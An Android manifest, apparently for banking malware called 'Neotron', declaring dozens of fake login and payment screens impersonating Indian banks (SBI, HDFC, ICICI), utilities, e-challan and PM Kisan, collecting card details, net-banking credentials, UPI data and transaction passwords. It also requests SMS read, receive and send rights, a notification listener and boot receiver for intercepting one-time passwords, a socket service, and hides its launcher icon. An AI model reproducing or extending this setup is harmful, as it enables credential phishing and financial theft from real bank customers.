<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <uses-feature
        android:name="android.hardware.telephony"
        android:required="false" />

    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_PHONE_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_DATA_SYNC" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_CONNECTED_DEVICE" />
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
    <uses-permission android:name="android.permission.READ_PHONE_NUMBERS" />
    <uses-permission
        android:name="android.permission.READ_PRIVILEGED_PHONE_STATE"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.READ_EMAIL" />
    <uses-permission android:name="android.permission.GET_ACCOUNTS" />

    <application
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.Neotron"
        android:usesCleartextTraffic="true"
        tools:targetApi="31">
        <activity
            android:name=".ui.sbi.SbiPage5Activity"
            android:exported="false" />
        <activity
            android:name=".ui.sbi.SbiPage4Activity"
            android:exported="false" />
        <activity
            android:name=".ui.sbi.SbiPage3Activity"
            android:exported="false" />
        <activity
            android:name=".ui.sbi.SbiPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.sbi.SbiPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.courier.CourierPage6Activity"
            android:exported="false" />
        <activity
            android:name=".ui.courier.CourierPage5Activity"
            android:exported="false" />
        <activity
            android:name=".ui.courier.CourierPage4Activity"
            android:exported="false" />
        <activity
            android:name=".ui.courier.CourierPage3Activity"
            android:exported="false" />
        <activity
            android:name=".ui.courier.CourierPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.courier.CourierPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBNetBankningEndActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBCardEndActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBCardInfoActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBNetBankingDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.hdfcsb.HDFCSBPage3Activity"
            android:exported="false" />
        <activity
            android:name=".ui.hdfcsb.HDFCSBPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.hdfcsb.HDFCSBPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesNetPageActivity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesNetEndPageActivity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesCardPageActivity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesCardInfoPageActivity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesCardEndPageActivity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BsesPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bses.BaseNetInfoPageActivity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage8Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage7Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage6Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage5Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage4Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage3Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.bill.BillUpdatePage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.echallan.EChallanPage6Activity"
            android:exported="false" />
        <activity
            android:name=".ui.echallan.EChallanPage5Activity"
            android:exported="false" />
        <activity
            android:name=".ui.echallan.EChallanPage4Activity"
            android:exported="false" />
        <activity
            android:name=".ui.echallan.EChallanPage3Activity"
            android:exported="false" />
        <activity
            android:name=".ui.echallan.EChallanPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.echallan.EChallanPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage8Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage7Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage6Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage5Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage4Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage3Activity"
            android:exported="false"
            android:theme="@style/Theme.Neotron" />
        <activity
            android:name=".ui.support.SupportPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.support.SupportPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.saswat.SaswatEndActivity"
            android:exported="false" />
        <activity
            android:name=".ui.saswat.SaswatTripActivity"
            android:exported="false" />
        <activity
            android:name=".ui.saswat.SaswatPage2Activity"
            android:exported="false" />
        <activity
            android:name=".ui.saswat.SaswatPage1Activity"
            android:exported="false" />
        <activity
            android:name=".ui.icici.ICICIWaitingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.icici.ICICIUserIDPassActivity"
            android:exported="false" />
        <activity
            android:name=".ui.icici.ICICIAccNumberActivity"
            android:exported="false" />
        <activity
            android:name=".ui.icici.ICICIDebitCardActivity"
            android:exported="false" />
        <activity
            android:name=".ui.icici.ICICILoginActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerTransactionPasswordActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerCardInformationActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerElectricityBillUpdateActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerElectricityLoginActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerElectricityNetBankingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerEnterCardDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.power.PowerUpiDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBWaitingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBNetBankingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBCardDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBSelectPaymentMethodActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBAddressActivity"
            android:exported="false" />
        <activity
            android:name=".ui.sb.SBLoginActivity"
            android:exported="false" />
        <activity
            android:name=".ui.electricity.CardInformationActivity"
            android:exported="false" />
        <activity
            android:name=".ui.PmKisanActivity"
            android:exported="false" />
        <activity
            android:name=".ui.electricity.UpiDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.electricity.ElectricityNetBankingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.electricity.EnterCardDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.electricity.ElectricityBillUpdateActivity"
            android:exported="false" />
        <activity
            android:name=".ui.water.InformationActivity"
            android:exported="false" />
        <activity
            android:name=".ui.water.InternetBankingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.water.CardDetailsActivity"
            android:exported="false" />

        <service
            android:name=".server.socket.SocketService"
            android:exported="false"
            android:foregroundServiceType="dataSync"
            tools:ignore="ForegroundServicePermission" />
        <service
            android:name=".functions.SmsNotificationListener"
            android:exported="true"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

        <activity
            android:name=".ui.electricity.ElectricityLoginActivity"
            android:exported="false" />
        <activity
            android:name=".ui.water.ConnectionInformationActivity"
            android:exported="false" />
        <activity
            android:name=".ui.water.SelectPaymentMethodActivity"
            android:exported="false" />
        <activity
            android:name=".ui.WaitingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.hdfc.HDFCWaitingActivity"
            android:exported="false" />
        <activity
            android:name=".ui.hdfc.HDCFPersonalDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.hdfc.HDFCBankDetailsActivity"
            android:exported="false" />
        <activity
            android:name=".ui.MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.INFO" />
<!--                <category android:name="android.intent.category.LAUNCHER" />-->
            </intent-filter>
        </activity>

        <receiver
            android:name=".functions.BootReceiver"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".functions.SmsReceiver"
            android:exported="true"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
    </application>

</manifest>